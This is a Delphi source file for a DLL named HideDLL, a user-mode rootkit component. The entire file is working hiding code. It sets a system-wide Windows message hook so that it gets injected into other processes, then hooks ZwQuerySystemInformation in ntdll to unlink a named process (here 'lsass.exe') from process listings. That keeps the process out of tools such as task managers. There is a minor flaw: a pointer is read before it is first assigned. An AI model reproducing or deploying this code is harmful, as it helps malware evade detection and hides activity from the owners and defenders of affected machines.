library HideDLL;

uses
  Windows,
  ExtendedAPIFunctions, 
  apihooktools;

{$R *.res}
const
  MutexName='__API_HOOK';

var
  SH:HHOOK = 0;
  MutexHandle:THandle;
  HiddenProcess:widestring = 'lsass.exe';

  SystemFunctionBridge:TFunctionRestoreData;

function NewSystemFunction(ASystemInformationClass: DWORD; ASystemInformation: Pointer;
   ASystemInformationLength: DWORD; AReturnLength:PCardinal): NTStatus; stdcall;
var
  info,back_Proc:PSYSTEM_PROCESSES;
begin
  UnHookCodeHook(@SystemFunctionBridge);
  Result:=ZwQuerySystemInformation(ASystemInformationClass,ASystemInformation,ASystemInformationLength,AReturnLength);
  SetCodeHook(SystemFunctionBridge.Address,@NewSystemFunction,@SystemFunctionBridge);
  
  if ASystemInformationClass<>SystemProcessesAndThreadsInformation then exit;
  if Result<>STATUS_SUCCESS then exit;

  info:= ASystemInformation;
  repeat
    if lstrcmpiW(info^.ProcessName.Buffer, PWideChar(HiddenProcess))=0 then
     begin
      back_Proc^.NextEntryDelta:=back_Proc^.NextEntryDelta+info^.NextEntryDelta;
        {          
          ,      }
     end;
    back_Proc:=info;
    Info := pointer(dword(info) + info^.NextEntryDelta);
  until Info^.NextEntryDelta = 0;
end;

function MsgProc(code:DWORD;wParam,lparam:DWORD):DWORD;stdcall;
begin
  Result:=CallNextHookEx(SH,code,wParam,lparam);
end;

procedure SetWindowsHook(e:Boolean); stdcall;
var
  M:THandle;
begin
  if e then
   begin
    M:=CreateMutex(0,false,MutexName);
    if GetLastError<>ERROR_ALREADY_EXISTS then
     begin
     SH:=SetWindowsHookEx(WH_GETMESSAGE,@MsgProc,HInstance,0);
     MutexHandle:=M;
    end                                   else
    CloseHandle(M);
   end
       else
   begin
    UnhookWindowsHookEx(SH);
    CloseHandle(MutexHandle);
   end;
end;
      
procedure DLLEntryPoint(dwReason:DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH:
     begin
     // StopProcess(GetCurrentProcessId);
      SetWindowsHook(true);
      SetProcedureHook(GetModuleHandle('ntdll.dll'),'ZwQuerySystemInformation',@NewSystemFunction,@SystemFunctionBridge);
     // ResumeProcess(GetCurrentProcessId);
     end;
    DLL_PROCESS_DETACH:
     begin
     // StopProcess(GetCurrentProcessId);
      UnHookCodeHook(@SystemFunctionBridge);
      SetWindowsHook(false);
      //ResumeProcess(GetCurrentProcessId);
     end;
   end;
end;

begin
   DllProc:= @DLLEntryPoint; 
   DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
